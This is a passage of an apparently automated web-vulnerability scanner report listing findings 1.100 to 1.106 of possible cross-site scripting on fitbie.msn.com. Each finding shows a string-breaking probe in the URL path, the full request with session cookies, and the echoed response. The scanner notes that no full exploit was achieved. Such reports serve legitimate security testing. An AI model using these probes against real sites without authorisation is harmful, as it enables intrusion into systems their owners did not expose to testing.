X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:50 +0000
ETag: "1297607390-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:51 GMT
Date: Sun, 13 Feb 2011 14:29:51 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default28b05';f096ad2ca7c?destination=node%2Fdefault28b05';f096ad2ca7c&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.100. http://fitbie.msn.com/sites/default/files/reveal-toned-abs-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/reveal-toned-abs-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e415e'%3b3c4c5453f52 was submitted in the REST URL parameter 2. This input was echoed as e415e';3c4c5453f52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaulte415e'%3b3c4c5453f52/files/reveal-toned-abs-th.jpg?1296250768 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:42 +0000
ETag: "1297607382-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:43 GMT
Date: Sun, 13 Feb 2011 14:29:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulte415e';3c4c5453f52?destination=node%2Fdefaulte415e';3c4c5453f52&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.101. http://fitbie.msn.com/sites/default/files/rw_5k_training_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/rw_5k_training_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c04ef'%3be5ad7847917 was submitted in the REST URL parameter 2. This input was echoed as c04ef';e5ad7847917 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultc04ef'%3be5ad7847917/files/rw_5k_training_th.jpg?1286986707 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:02 +0000
ETag: "1297607402-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:03 GMT
Date: Sun, 13 Feb 2011 14:30:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultc04ef';e5ad7847917?destination=node%2Fdefaultc04ef';e5ad7847917&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.102. http://fitbie.msn.com/sites/default/files/rw_half_marathon_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/rw_half_marathon_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 546c0'%3b5d84375f29e was submitted in the REST URL parameter 2. This input was echoed as 546c0';5d84375f29e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default546c0'%3b5d84375f29e/files/rw_half_marathon_th.jpg?1286986579 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:01 +0000
ETag: "1297607401-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:02 GMT
Date: Sun, 13 Feb 2011 14:30:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default546c0';5d84375f29e?destination=node%2Fdefault546c0';5d84375f29e&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.103. http://fitbie.msn.com/sites/default/files/shulah-after-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/shulah-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f49'%3b81ce5708e35 was submitted in the REST URL parameter 2. This input was echoed as b1f49';81ce5708e35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultb1f49'%3b81ce5708e35/files/shulah-after-th.jpg?1294792258 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:42 +0000
ETag: "1297607202-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:42 GMT
Date: Sun, 13 Feb 2011 14:26:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultb1f49';81ce5708e35?destination=node%2Fdefaultb1f49';81ce5708e35&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.104. http://fitbie.msn.com/sites/default/files/sing_arm_dbell_swingB-female-th_1.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/sing_arm_dbell_swingB-female-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b006d'%3b0f74431377f was submitted in the REST URL parameter 2. This input was echoed as b006d';0f74431377f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultb006d'%3b0f74431377f/files/sing_arm_dbell_swingB-female-th_1.jpg?1293055722 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:52 +0000
ETag: "1297607392-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:52 GMT
Date: Sun, 13 Feb 2011 14:29:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultb006d';0f74431377f?destination=node%2Fdefaultb006d';0f74431377f&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.105. http://fitbie.msn.com/sites/default/files/slim-woman-posing-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/slim-woman-posing-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a33'%3b8a58ec615eb was submitted in the REST URL parameter 2. This input was echoed as 93a33';8a58ec615eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default93a33'%3b8a58ec615eb/files/slim-woman-posing-th.jpg?1297192284 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:13 +0000
ETag: "1297607173-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:13 GMT
Date: Sun, 13 Feb 2011 14:26:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default93a33';8a58ec615eb?destination=node%2Fdefault93a33';8a58ec615eb&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.106. http://fitbie.msn.com/sites/default/files/slim_calm_sexy_th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/slim_calm_sexy_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a767d'%3b87fcf881513 was submitted in the REST URL parameter 2. This input was echoed as a767d';87fcf881513 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaulta767d'%3b87fcf881513/files/slim_calm_sexy_th.jpg?1286980959 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; 